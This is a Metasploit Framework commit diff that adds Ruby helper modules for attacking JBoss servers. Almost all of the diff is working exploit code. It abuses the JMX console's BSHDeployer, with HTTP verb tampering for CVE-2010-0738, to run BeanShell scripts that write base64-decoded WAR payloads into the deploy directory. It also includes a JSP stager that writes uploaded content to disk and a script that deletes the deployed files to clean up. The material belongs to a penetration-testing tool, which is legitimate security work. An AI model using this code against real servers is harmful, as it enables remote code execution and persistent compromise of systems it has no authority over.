Land rapid7#3540, JBoss refactoring with @us3r777

Author: jvazquez-r7

lib/msf/core.rb

@@ -60,6 +60,7 @@ module Msf
 # Custom HTTP Modules
 require 'msf/http/wordpress'
 require 'msf/http/typo3'
+require 'msf/http/jboss'
 
 # Drivers
 require 'msf/core/exploit_driver'

lib/msf/http/jboss.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+# This module provides a way of interacting with JBoss installations
+module Msf
+  module HTTP
+    module JBoss
+      require 'msf/http/jboss/base'
+      require 'msf/http/jboss/bean_shell_scripts'
+      require 'msf/http/jboss/bean_shell'
+
+      include Msf::Exploit::Remote::HttpClient
+      include Msf::HTTP::JBoss::Base
+      include Msf::HTTP::JBoss::BeanShellScripts
+      include Msf::HTTP::JBoss::BeanShell
+
+      def initialize(info = {})     
+        super
+
+        register_options(
+          [
+            OptString.new('TARGETURI', [true,  'The URI path of the JMX console', '/jmx-console']),
+            OptEnum.new('VERB',        [true,  'HTTP Method to use (for CVE-2010-0738)', 'POST', ['GET', 'POST', 'HEAD']]),
+            OptString.new('PACKAGE',   [false, 'The package containing the BSHDeployer service'])
+          ], self.class)
+      end
+
+    end
+  end
+end

lib/msf/http/jboss/base.rb

@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::Base
+
+  # Deploys a WAR through HTTP uri invoke
+  #
+  # @param opts [Hash] Hash containing {Exploit::Remote::HttpClient#send_request_cgi} options
+  # @param num_attempts [Integer] The number of attempts 
+  # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response if exists, nil otherwise
+  def deploy(opts = {}, num_attempts = 5)
+    uri = opts['uri']
+
+    if uri.blank?
+      return nil
+    end
+
+    # JBoss might need some time for the deployment. Try 5 times at most and
+    # wait 5 seconds inbetween tries
+    num_attempts.times do |attempt|
+      res = send_request_cgi(opts, 5)
+      msg = nil
+      if res.nil?
+        msg = "Execution failed on #{uri} [No Response]"
+      elsif res.code == 200
+        vprint_status("Successfully called '#{uri}'")
+        return res
+      else
+        msg = "http request failed to #{uri} [#{res.code}]"
+      end
+
+      if attempt < num_attempts - 1
+        msg << ", retrying in 5 seconds..."
+        vprint_status(msg)
+        Rex.sleep(5)
+      else
+        print_error(msg)
+        return res
+      end
+    end
+  end
+
+  # Provides the HTTP verb used
+  #
+  # @return [String] The HTTP verb in use
+  def http_verb
+    datastore['VERB']
+  end
+
+end

lib/msf/http/jboss/bean_shell.rb

@@ -0,0 +1,86 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::BeanShell
+
+  DEFAULT_PACKAGES = %w{ deployer scripts }
+
+  # Deploys a Bean Shell script with a set of JBOSS default packages
+  #
+  # @param bsh_script [String] The Bean Shell script to deploy
+  # @return [String, nil] The package name used to deploy the script, nil otherwise
+  def deploy_bsh(bsh_script)
+    package = nil
+
+    if datastore['PACKAGE'].blank?
+      packages = DEFAULT_PACKAGES
+    else
+      packages = [ datastore['PACKAGE'] ]
+    end
+
+    packages.each do |p|
+      if deploy_package(bsh_script, p)
+        return p
+      end
+    end
+
+    package
+  end
+
+  # Deploys a Bean Shell script using the specified package
+  #
+  # @param bsh_script [String] The Bean Shell script to deploy
+  # @param package [String] The package used to deploy the script
+  # @return [Boolean] `true` if the script gets deployed, `false` otherwise
+  def deploy_package(bsh_script, package)
+    success = false
+
+    print_status("Attempting to use '#{package}' as package")
+    res = invoke_bsh_script(bsh_script, package)
+
+    if res.nil?
+      print_error("Unable to deploy WAR [No Response]")
+    elsif res.code < 200 || res.code >= 300
+      case res.code
+      when 401
+        print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
+      else
+        print_error("Unable to deploy BSH script [#{res.code} #{res.message}]")
+      end
+    else
+      success = true
+    end
+
+    success
+  end
+
+  # Invokes a Bean Shell script on the JBoss via BSHDeployer
+  #
+  # @param bsh_script [String] A Bean Shell script
+  # @param package [String] The package used to deploy the script
+  # @return [Rex::Proto::Http::Response, nil] The {Rex::Proto::Http::Response} response, nil if timeout
+  def invoke_bsh_script(bsh_script, package)
+    params =  { }
+    params.compare_by_identity
+    params['action']     = 'invokeOpByName'
+    params['name']       = "jboss.#{package}:service=BSHDeployer"
+    params['methodName'] = 'createScriptDeployment'
+    params['argType']    = 'java.lang.String'
+    params['arg0']       = bsh_script
+    params['argType']    = 'java.lang.String'
+    params['arg1']       = Rex::Text.rand_text_alphanumeric(8+rand(8)) + '.bsh'
+
+    opts = {
+      'method'	=> http_verb,
+      'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
+    }
+
+    if http_verb == 'POST'
+      opts.merge!('vars_post' => params)
+    else
+      opts.merge!('vars_get' => params)
+    end
+
+    send_request_cgi(opts)
+  end
+
+end

lib/msf/http/jboss/bean_shell_scripts.rb

@@ -0,0 +1,105 @@
+# -*- coding: binary -*-
+
+module Msf::HTTP::JBoss::BeanShellScripts
+  
+  # Generates a Bean Shell Script.
+  #
+  # @param type [Symbol] The Bean Shell script type, `:create` or `:delete`.
+  # @param opts [Hash] Hash of configuration options.
+  # @return [String] A Bean Shell script.
+  def generate_bsh(type, opts ={})
+    bean_shell = nil
+    case type
+    when :create
+      bean_shell = create_file_bsh(opts)
+    when :delete
+      bean_shell = delete_files_bsh(opts)
+    end
+
+    bean_shell
+  end
+
+  # Generate a stager JSP to write a WAR file to the deploy/ directory.
+  # This is used to bypass the size limit for GET/HEAD requests.
+  #
+  # @param app_base [String] The name of the WAR app to write.
+  # @return [String] The JSP stager.
+  def stager_jsp(app_base)
+    decoded_var = Rex::Text.rand_text_alpha(8+rand(8))
+    file_path_var = Rex::Text.rand_text_alpha(8+rand(8))
+    jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
+    fos_var = Rex::Text.rand_text_alpha(8+rand(8))
+    content_var = Rex::Text.rand_text_alpha(8+rand(8))
+
+    stager_jsp = <<-EOT
+<%@page import="java.io.*,
+    java.util.*,
+    sun.misc.BASE64Decoder"
+%>
+<%
+  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+  String #{file_path_var} = #{jboss_home_var} + "/deploy/" + "#{app_base}.war";
+  try {
+    String #{content_var} = "";
+    String parameterName = (String)(request.getParameterNames().nextElement());
+    #{content_var} = request.getParameter(parameterName);
+    FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
+    byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
+    #{fos_var}.write(#{decoded_var});
+    #{fos_var}.close();
+  }
+  catch(Exception e){ }
+%>
+    EOT
+
+    stager_jsp
+  end
+
+  # Generate a Bean Shell script which creates files inside the JBOSS's deploy
+  #   directory.
+  #
+  # @param opts [Hash] Hash containing the options to create the Bean Shell
+  #   Script.
+  # @option opts :dir [Symbol] The dir where place the file.
+  # @option opts :file [Symbol] The file path.
+  # @option opts :contents [Symbol] The file contents.
+  # @return [String] A Bean Shell script to create the file.
+  def create_file_bsh(opts = {})
+    dir = opts[:dir]
+    file = opts[:file]
+    contents = opts[:contents]
+
+    payload_bsh_script = <<-EOT
+import java.io.FileOutputStream;
+import sun.misc.BASE64Decoder;
+
+String val = "#{contents}";
+
+BASE64Decoder decoder = new BASE64Decoder();
+String jboss_home = System.getProperty("jboss.server.home.dir");
+new File(jboss_home + "/deploy/#{dir}").mkdir();
+byte[] byteval = decoder.decodeBuffer(val);
+String location = jboss_home + "/deploy/#{file}";
+FileOutputStream fstream = new FileOutputStream(location);
+fstream.write(byteval);
+fstream.close();
+    EOT
+
+    payload_bsh_script
+  end
+
+  # Generate a Bean Shell script to delete files from the JBoss's /deploy
+  #   directory.
+  #
+  # @param opts [Hash] Hash containing the files to delete, the values are
+  #   the files paths.
+  # @return [String] A Bean Shell script to delete files.
+  def delete_files_bsh(opts = {})
+    script = "String jboss_home = System.getProperty(\"jboss.server.home.dir\");\n"
+    opts.values.each do |v|
+      script << "new File(jboss_home + \"/deploy/#{v}\").delete();\n"
+    end
+
+    script
+  end
+end